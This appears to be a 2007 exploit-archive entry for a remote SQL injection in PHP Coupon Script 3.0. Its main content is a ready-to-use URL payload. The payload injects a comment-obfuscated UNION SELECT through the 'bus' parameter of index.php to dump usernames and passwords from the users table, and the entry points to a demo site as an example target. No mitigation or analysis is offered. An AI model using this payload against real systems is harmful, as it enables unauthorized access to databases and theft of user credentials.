[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP Coupon Script 3.0 (index.php bus) Remote SQL Injection Vulnerability
# Published : 2007-05-03
# Author : xoron
# Previous Title : Open Translation Engine (OTE) 0.7.8 (header.php ote_home) RFI Vuln
# Next Title : Pre Classifieds Listings 1.0 Remote SQL Injection Vulnerability
==============================================
PHP Coupon Script 3.0 Remote SQL Injection
==============================================
Found: Cyber-Security.org
==============================================
Script site: http://www.couponscript.com/
==============================================
Exploit:
index.php?page=viewbus&bus=-1/**/union/**/select/**/null,null,null,username,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/users/*
==============================================
Example: http://www.couponscript.com/demo/
==============================================
# www.Syue.com [2007-05-03]